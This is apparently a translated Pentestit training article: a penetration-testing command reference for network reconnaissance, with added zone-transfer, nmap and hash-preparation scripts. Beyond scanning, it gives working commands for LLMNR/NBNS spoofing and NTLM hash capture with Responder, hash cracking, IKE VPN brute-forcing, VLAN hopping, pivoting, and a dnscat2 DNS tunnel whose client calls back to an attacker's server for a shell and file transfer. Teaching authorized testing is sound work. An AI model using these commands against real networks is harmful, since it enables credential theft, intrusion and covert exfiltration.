One of the main activities of Pentestit is the development of specialized introductory (Zero Security: A) and professional (Corporate Laboratories) training programs in information security. Whichever program you choose, its key features are up-to-date material and hands-on work in pentest laboratories, which make up 80% of the course. In this article we look at the basic commands and useful tricks used when penetration testing an external perimeter.
Many newcomers to the specialized distributions (Kali Linux, BlackArch, BackBox, etc.) are not familiar with the basic command syntax and the elementary tools used in penetration testing. There are now so many utilities and techniques that it is easy to lose track of what to use, when and in which situation. To help with this, we have prepared a brief guide to the main commands and utilities.
This handbook is a list of commands you may need when conducting a penetration test. It deliberately does not describe the commands in detail; it only gives working examples. For more information about a command or utility, read its man page or visit the official website.
The handbook is mostly concerned with network and infrastructure testing. Testing web applications is not covered, apart from a few sqlmap examples at the end of the tutorial.
Assign IP Address
ifconfig eth0 xxx.xxx.xxx.xxx/24
Subnet Information
ipcalc xxx.xxx.xxx.xxx/24
ipcalc xxx.xxx.xxx.xxx 255.255.255.0
WHOIS:
whois domain-name-here.com
Performing DNS lookup queries:
dig @nameserver domainname.com A
MX Record Detection:
dig @nameserver domainname.com MX
Performing a Zone Transfer request using DIG:
dig @nameserver domainname.com AXFR
Windows DNS zone transfer
nslookup
> set type=any
> ls -d blah.com
Linux DNS zone transfer
dig @ns1.blah.com blah.com axfr
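Checking AXFR by hand against each nameserver gets tedious when an engagement covers many domains. The script below is an added example, not part of the original article: it pulls the NS records with dig, attempts a zone transfer from each server, and decides from dig's own output whether the transfer succeeded (a completed AXFR is bracketed by two SOA records; a refusal prints "Transfer failed." and no records). The domain example.test, the server names and the records in the embedded sample output are constructed for the self-test and are not from any real scan.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): try AXFR against every
# authoritative nameserver of a domain and report which ones allow it.
# Usage: ./axfr_check.sh example.com

# Decide from the text of a `dig @ns domain AXFR` run whether a transfer
# completed. A successful AXFR is bracketed by two SOA records; a refusal
# shows "Transfer failed." (or a REFUSED/NOTAUTH/SERVFAIL status) and no SOA.
axfr_succeeded() {
    local output="$1" soa
    if printf '%s\n' "$output" | grep -qiE 'Transfer failed|status: (REFUSED|NOTAUTH|SERVFAIL)|connection (refused|timed out)'; then
        return 1
    fi
    # Resource records are the non-comment lines; the record type is field 4
    # (name, TTL, class, type, rdata...).
    soa=$(printf '%s\n' "$output" | awk '$1 !~ /^;/ && $4 == "SOA" { n++ } END { print n + 0 }')
    [ "$soa" -ge 2 ]
}

# Number of resource records in a transfer (non-comment, non-empty lines).
count_records() {
    printf '%s\n' "$1" | awk 'NF > 0 && $1 !~ /^;/ { n++ } END { print n + 0 }'
}

# Live check (needs network): enumerate NS records, then try AXFR from each.
check_domain() {
    local domain="$1" ns out
    for ns in $(dig +short NS "$domain"); do
        out=$(dig @"$ns" "$domain" AXFR +time=5 +tries=1 2>&1)
        if axfr_succeeded "$out"; then
            printf '[+] %s allows AXFR for %s (%s records)\n' "$ns" "$domain" "$(count_records "$out")"
        else
            printf '[-] %s refuses AXFR for %s\n' "$ns" "$domain"
        fi
    done
}

# Constructed sample dig outputs (not real servers), used to exercise the parser.
SAMPLE_AXFR_OK='; <<>> DiG 9.18.1 <<>> @ns1.example.test example.test AXFR
;; global options: +cmd
example.test.        3600 IN SOA ns1.example.test. hostmaster.example.test. 2024010101 7200 3600 1209600 3600
example.test.        3600 IN NS  ns1.example.test.
www.example.test.    3600 IN A   192.0.2.10
vpn.example.test.    3600 IN A   192.0.2.20
example.test.        3600 IN SOA ns1.example.test. hostmaster.example.test. 2024010101 7200 3600 1209600 3600
;; Query time: 12 msec'

SAMPLE_AXFR_REFUSED='; <<>> DiG 9.18.1 <<>> @ns2.example.test example.test AXFR
;; global options: +cmd
; Transfer failed.'

if [ -n "${1:-}" ]; then
    check_domain "$1"
fi
```

Run it as `./axfr_check.sh target.com`; a server that answers `[+]` leaks its whole zone, which is a finding in itself and also gives you the host list for the rest of the recon.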
Use SimplyEmail to collect email addresses for the target domain from public sources (GitHub, the target site, search engines, etc.). The tool works more reliably through a proxy and with large delays, so that Google does not flag the activity as suspicious and start serving captchas.
git clone https://github.com/killswitch-GUI/SimplyEmail.git
cd SimplyEmail
./SimplyEmail.py -all -e TARGET-DOMAIN
SimplyEmail can also verify the collected addresses after the collection run.
Grabbing the SMTP service banner:
nc -v 192.168.1.1 25
telnet 192.168.1.1 25
Grabbing an HTTP banner with nc (type the request, then an empty line and Enter to send it):
nc TARGET-IP 80
GET / HTTP/1.1
Host: TARGET-IP
User-Agent: Mozilla/5.0
Referer: meh-domain
<enter>
DNSRecon (-t std runs the standard enumeration: AXFR attempt, then SOA, NS, A/AAAA, MX and SRV; the -D wordlist is only consumed by the brute-force type, -t brt):
dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml
Nmap scan with verbose output, SYN scan, T4 timing (suitable for a LAN), OS and service version detection, traceroute and default NSE scripts against the discovered services (-A bundles -sV, -O, -sC and --traceroute):
nmap -v -sS -A -T4 target
The same, but across all 65535 TCP ports and treating the host as up even if it does not answer ICMP (takes longer):
nmap -v -sS -p- -A -T4 -Pn target
The same plus a UDP scan of the whole port range (takes a very long time):
nmap -v -sU -sS -p- -A -T4 target
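The three scans above get progressively slower, and on a /24 the -p- -A variant is impractical. A common approach is a fast sweep of all ports in grepable format, followed by the slow -A checks only against the ports that were actually open. The script below is an added example, not from the original article: it parses nmap -oG output into open host/port pairs (dropping UDP "open|filtered" guesses), groups the ports per host and feeds each host to the second scan. The grepable output embedded in it is a constructed sample, not a real scan; `--min-rate` is a standard nmap option, and the two_stage_scan wrapper is this example's own.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): two-stage nmap sweep.
# Stage 1 finds open ports quickly (-oG = grepable output), stage 2 runs the
# slow -A style checks only against ports that were open.
# Usage: ./two_stage.sh 192.168.1.0/24      (needs root for -sS and -O)

# stdin: nmap -oG output. stdout: "host port proto service" for each OPEN port.
# -oG fields are tab-separated; the Ports: field is "port/state/proto//service///, ...".
# Only state "open" is kept, so UDP "open|filtered" guesses are dropped.
open_ports_from_grepable() {
    awk -F'\t' '
        /Ports:/ {
            split($1, h, " "); host = h[2]
            for (i = 2; i <= NF; i++) {
                if ($i ~ /^Ports: /) {
                    sub(/^Ports: /, "", $i)
                    n = split($i, p, ", ")
                    for (j = 1; j <= n; j++) {
                        split(p[j], f, "/")
                        if (f[2] == "open") print host, f[1], f[3], f[5]
                    }
                }
            }
        }'
}

# stdin: lines from open_ports_from_grepable. stdout: "host port1,port2,..."
ports_by_host() {
    awk '{ if ($1 in ports) ports[$1] = ports[$1] "," $2; else ports[$1] = $2 }
         END { for (h in ports) print h, ports[h] }'
}

# Live pipeline (needs network and root).
two_stage_scan() {
    local target="$1" host ports
    nmap -sS -p- -T4 -Pn --min-rate 1000 -oG - "$target" \
      | open_ports_from_grepable | ports_by_host \
      | while read -r host ports; do
            nmap -sV -sC -O --traceroute -p "$ports" -oA "deep_${host}" "$host"
        done
}

# Constructed sample of nmap -oG output (not a real scan) to exercise the parser.
sample_gnmap() {
    printf '%s\n' '# Nmap 7.94 scan initiated (constructed sample)'
    printf 'Host: 192.0.2.1 ()\tStatus: Up\n'
    printf 'Host: 192.0.2.1 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/filtered/tcp//https///\tIgnored State: closed (65532)\n'
    printf 'Host: 192.0.2.2 ()\tStatus: Up\n'
    printf 'Host: 192.0.2.2 ()\tPorts: 445/open/tcp//microsoft-ds///, 161/open|filtered/udp//snmp///\n'
    printf '%s\n' '# Nmap done -- 2 IP addresses (2 hosts up) scanned'
}

if [ -n "${1:-}" ]; then
    two_stage_scan "$1"
else
    sample_gnmap | open_ports_from_grepable | ports_by_host
fi
```

Without an argument the script just runs the parser over the embedded sample and prints `192.0.2.1 22,80` and `192.0.2.2 445`; with a target it performs the real two-stage scan. The -oA files of the second stage keep the per-host results in all three output formats.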
Nmap script to detect vulnerable SMB servers (WARNING: unsafe=1 enables checks that can crash the target service). In current Nmap releases smb-check-vulns has been split into the individual smb-vuln-* scripts (smb-vuln-ms08-067, smb-vuln-ms17-010 and others), which take the same unsafe argument:
nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 192.168.1.X
Search NSE scripts by regular expressions
ls /usr/share/nmap/scripts/* | grep ftp
Nmap UDP scan
nmap -sU target
UDP Protocol Scanner
git clone https://github.com/portcullislabs/udp-proto-scanner.git
Scan the IP addresses listed in a file for all supported UDP services:
./udp-proto-scanner.pl -f ip.txt
Scan a specific UDP service:
./udp-proto-scanner.pl -p ntp -f ips.txt
Checks if a host is available by sending an ARP request:
arping 192.168.1.1 -c 1
Discovers IP, MAC addresses in a subnet via ARP (may be useful for checking VLANs):
netdiscover -r 192.168.1.0/24
SMB enumeration:
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target
Detects Windows / Samba servers in the subnet and reports each host's MAC address, NetBIOS name and workgroup / domain:
nbtscan 192.168.1.0/24
Listing SMB shares (older smbclient versions also print the server's OS / Samba version banner):
smbclient -L //192.168.1.100
Enumerate SMB shares across a subnet with a known account:
nmap -T4 -v -oA shares --script=smb-enum-shares --script-args=smbuser=username,smbpass=password -p445 192.168.1.0/24
SMB user enumeration:
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX
RID Cycling Attack:
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt
Metasploit module for RID cycling:
use auxiliary/scanner/smb/smb_lookupsid
Null session check. Windows:
net use \\TARGET\IPC$ "" /u:""
Linux:
smbclient -L //192.168.99.131 -N
NBTScan (unixwiz version):
apt-get install nbtscan-unixwiz
nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan
Spoofing LLMNR / NetBIOS name resolution responses (Metasploit modules):
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
Capturing NTLM hashes from the redirected clients (Metasploit modules):
auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm
To crack a captured NetNTLMv2 hash, use john or hashcat.
Alternatively, do the spoofing and capture with Responder.py (the SpiderLabs repository is archived; development continues at https://github.com/lgandx/Responder, and recent versions derive the local IP from -I and no longer accept -i):
git clone https://github.com/SpiderLabs/Responder.git
python Responder.py -i local-ip -I eth0
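Responder (and the Metasploit capture modules above, when JOHNPWFILE is set) write the captured NetNTLMv2 challenge-responses in the user::DOMAIN:challenge:response:blob form that hashcat mode 5600 and john's netntlmv2 format accept directly. Every authentication attempt produces a new line for the same account, and the cracker spends a full wordlist pass on each line, so it pays to keep one capture per account before cracking. The script below is an added example, not code from the article or from Responder; the hashes in its sample log are constructed random hex, not real captures.

```shell
#!/usr/bin/env bash
# Added example (not from the original article): prepare captured NetNTLMv2
# hashes for offline cracking with hashcat (-m 5600) or john (netntlmv2).
# Usage: ./prep_ntlmv2.sh Responder/logs/SMB-NTLMv2-SSP-*.txt > ntlmv2.txt

# stdin: raw capture log lines. stdout: one NetNTLMv2 line per DOMAIN\user.
# A NetNTLMv2 line is user::DOMAIN:<16 hex server challenge>:<32 hex NTProofStr>:<hex blob>.
# Anything else (status messages, NTLMv1, truncated lines) is dropped, and
# only the first capture per account is kept: each line costs a full wordlist
# pass, and every capture for the same account cracks to the same password.
dedupe_ntlmv2() {
    grep -E '^[^:]+::[^:]*:[0-9A-Fa-f]{16}:[0-9A-Fa-f]{32}:[0-9A-Fa-f]+$' \
    | awk -F: '{ key = tolower($3 "\\" $1) } !(key in seen) { seen[key] = 1; print }'
}

# Crack the prepared file (live; needs hashcat installed).
crack_ntlmv2() {
    local hashes="$1" wordlist="$2"
    # Equivalent john invocation: john --format=netntlmv2 --wordlist="$wordlist" "$hashes"
    hashcat -m 5600 -a 0 "$hashes" "$wordlist"
}

# Constructed sample log (random hex, not real captures) to exercise the filter:
# alice appears twice (two SMB attempts, different server challenges), bob once,
# plus a Responder status line that must be ignored.
sample_capture_log() {
    printf '%s\n' \
      '[SMB] NTLMv2-SSP Client   : 192.0.2.50' \
      'alice::CORP:1122334455667788:0123456789abcdef0123456789abcdef:0101000000000000aabbccdd11223344' \
      'ALICE::corp:8877665544332211:fedcba9876543210fedcba9876543210:0101000000000000ddccbbaa44332211' \
      'bob::CORP:0011223344556677:00112233445566778899aabbccddeeff:0101000000000000eeff001122334455'
}

if [ "$#" -gt 0 ]; then
    cat "$@" | dedupe_ntlmv2
else
    sample_capture_log | dedupe_ntlmv2
fi
```

Account matching is case-insensitive on both domain and user, because Windows clients send them in whatever case the user typed while the server treats them as the same account. Run `crack_ntlmv2 ntlmv2.txt /usr/share/wordlists/rockyou.txt` once the file is prepared.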
Make SNMP output readable (OIDs resolved to MIB names): install the MIBs and blank the default snmp.conf, whose "mibs :" line otherwise disables MIB loading:
apt-get install snmp-mibs-downloader
download-mibs
echo "" > /etc/snmp/snmp.conf
SNMP enumeration (the snmpwalk line lists the running processes exposed via hrSWRunName):
snmpcheck -t 192.168.1.X -c public
snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d ' ' -f 4
snmpenum -t 192.168.1.X
onesixtyone -c names -i hosts
Detecting SNMPv3 servers with nmap:
nmap -sV -p 161 --script=snmp-info target-subnet
Rory McCune's script automates username enumeration against SNMPv3:
https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
The Metasploit wordlist of default SNMP v1 / v2c community strings:
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt
testssl.sh: run every TLS check against the host and write an HTML report (aha converts the coloured terminal output to HTML):
./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html
Reverse port forwarding with plink (Windows): port 445 on REMOTE-IP is forwarded back to port 445 on the local host:
plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP
SSH pivoting (dynamic forwarding: a SOCKS proxy on local port 1010 that tunnels through the pivot host):
ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip
SSH pivoting from one subnet to another (chain a second SOCKS proxy through the first with proxychains):
ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1
(add "socks4 127.0.0.1 1010" to /etc/proxychains.conf)
proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2
(add "socks4 127.0.0.1 1011" to /etc/proxychains.conf, then run tools through proxychains to reach the second subnet)
Meterpreter pivoting (forward local port 3389 to the target's 3389 through the session, then remove the rule):
portfwd add -l 3389 -p 3389 -r target
portfwd delete -l 3389 -p 3389 -r target
NCC Group's frogger.sh (VLAN hopping built on Yersinia) automates the discovery and hopping steps:
git clone https://github.com/nccgroup/vlan-hopping.git
cd vlan-hopping
chmod 700 frogger.sh
./frogger.sh
Scanning for IKE (IPsec VPN) servers:
./udp-proto-scanner.pl -p ike TARGET(s)
Scanning a range of VPN servers listed in a file:
./udp-proto-scanner.pl -p ike -f ip.txt
Use IKEForce to enumerate or attack an IKE VPN server:
pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git
Enumerate valid group names (IDs) with IKEForce:
./ikeforce.py TARGET-IP -e -w wordlists/groupnames.dic
Brute-force the VPN user password (XAUTH) with IKEForce, given a known group ID and PSK:
./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
Fingerprint the VPN server with ike-scan, then capture the aggressive-mode PSK hash to a file for offline cracking with psk-crack:
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key
dnscat2 is a DNS tunnel that, besides a command shell, supports "download" and "upload" commands for transferring files (data or programs) to and from the target machine.
Attacking machine:
apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install
Start the dnscat2 server and interact with a session once a client connects (the "New session established" line is the server's output):
ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422
Target machine (prebuilt client binaries, or the PowerShell port):
https://downloads.skullsecurity.org/dnscat2/
https://github.com/lukebaggett/dnscat2-powershell/
dnscat --host <dnscat server_ip>
In the following articles I will extend this reference with commands and tricks for exploiting vulnerabilities, brute-forcing network services, examples of command shells, and more.
To resist attackers successfully, you need to know their methods and tools well, which is hard given how fast they evolve. The course program is updated every 3 months (after each intake), so that the knowledge and practical skills it provides stay current.
What makes the course program distinctive is how the material is presented and reinforced: 20% theory and 80% practice. By constantly updating the methodological material and adding practical tasks, we try to give participants a complete picture of current threats and countermeasures and open new directions for their development in practical information security.
Source: https://habr.com/ru/post/322834/